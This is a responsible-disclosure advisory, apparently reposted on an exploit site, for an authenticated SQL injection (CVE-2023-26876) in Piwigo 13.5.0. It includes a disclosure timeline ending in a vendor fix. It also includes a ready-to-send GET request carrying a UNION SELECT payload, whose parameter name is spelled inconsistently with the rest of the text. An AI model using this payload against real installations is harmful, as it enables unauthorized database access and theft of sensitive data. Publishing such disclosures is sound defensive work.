## https://sploitus.com/exploit?id=1337DAY-ID-38631
Piwigo - Version 13.5.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgments
* References
=====[ Vulnerability
Information]=============================================
* Class: improper Neutralization of Special Elements used in an SQL Command
('SQL injection') [CWE-89] improper Neutralization of Special Elements used
in an SQL Command ('SQL Injection')
* CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* CVE-2023-26876
=====[ Overview]========================================================
* System affected : Piwigo - Version 13.5.0
* Software Version : Version 13.5.0 (other versions may also be affected).
* Impact : Piwigo 13.5.0 is vulnerable to SQL injection via
/filter_user_id parameter to the
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An
attacker can exploit this by
executing SQL injection code to retrieve sensitive (P1) information and
performing unintended actions.
=====[ Detailed
description]=================================================
An authenticated user could run SQLi commands in the application and
retrieve sensitive information (P1) and database information. Using the
endpoint
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To
explore just execute the following request:
GET
/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT
%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--
HTTP/1.1
Host: localhost
Cookie: pwg_id=cookies
Check the value contained in the *filter_image_id* variable at the request
response.
=====[ Timeline of
disclosure]===============================================
12/Fev/2023 - Responsible disclosure was initiated with the vendor.
17/Fev/2023 - Piwigo confirmed the issue;
08/Mar/2023 - CVE-2023-26876 was assigned and reserved.
09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.
=====[ Thanks & Acknowledgments]========================================
* fxo,ravs
* Henrique Arcoverde < henrique.arcoverde () tempest.com.br >
* Tempest Security Intelligence / Tempest's Pentest Team [3]
=====[ References ]=====================================================
[1][https://cwe.mitre.org/data/definitions/89.html]
[2][https://github.com/Piwigo/Piwigo/issues/1876]
[3][https://www.tempest.com.br|http://www.tempest.com.br/]
[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]
=====[ EOF ]===========================================================